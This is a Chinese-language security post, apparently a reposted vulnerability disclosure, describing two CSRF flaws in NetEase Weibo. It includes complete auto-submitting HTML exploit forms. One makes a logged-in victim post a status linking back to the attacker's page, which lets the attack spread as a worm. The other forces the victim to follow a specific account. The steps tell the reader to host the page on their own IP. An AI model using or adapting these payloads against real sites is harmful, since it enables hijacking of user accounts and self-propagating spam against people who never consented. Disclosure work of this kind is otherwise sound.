没有进行token验证,易受CSRF攻击
详细说明: 恶意攻击者可构造恶意表单,并骗取受害者点击,当受害者点击链接时,会以受害者的名义产生一条微博信息,此方法可产生蠕虫,非常严重。
漏洞 证明: 测试方法: 1、将下列表单存储成index. html ,放在本地目录下,将183.174.39.46换成你自己的ip。 <form name="CSRF" method="POST" name="form0" action=" http://t.163测试数据:80/statuses/update.do "> <input type="hidden" name="status" value=" http://183.174.39.46/index.html"/ > <input type="hidden" name="in_reply_to_status_id" value="sendinfo"/> <input type="hidden" name="dispatchToFollowers" value=""/> </form> <script> document.CSRF.submit(); </script> 2、登录网易微博,然后访问 http://183.174.39.46/index.html 3、回到自己的页面, http://t.163测试数据/ ,会发现已经多出来一条微博消息。 4、关注你的人如果点击了那条微博消息,也会相应地发出一条一样的微博消息/
二,网易微博CSRF利用2:自动添加关注,并自动发微博
昨天我把问题想简单了,今天试了一下,网易微博的这个CSRF漏洞还可以自动添加关注的。配合着昨天那个自动发微博的功能,两者结合起来将会是很有意思的事情。这个问题太严重了,我都忍不住想作为0day发出去了,但是鉴于国庆节,就考虑一下各位的感受好了。
详细说明: 登录后访问构造出的表单,就能添加“小锅盖头”为关注。
漏洞证明: <form method="POST" name="CSRF" action=" http://t.163测试数据:80/friendships/create/3198225089.json "> <input type="hidden" name="name" value="value"/> </form> <script> document.CSRF.submit(); </script>
首发:x140m1ng,由情整理编辑
查看更多关于网易微博CSRF 两处利用 - 网站安全 - 自学php的详细内容...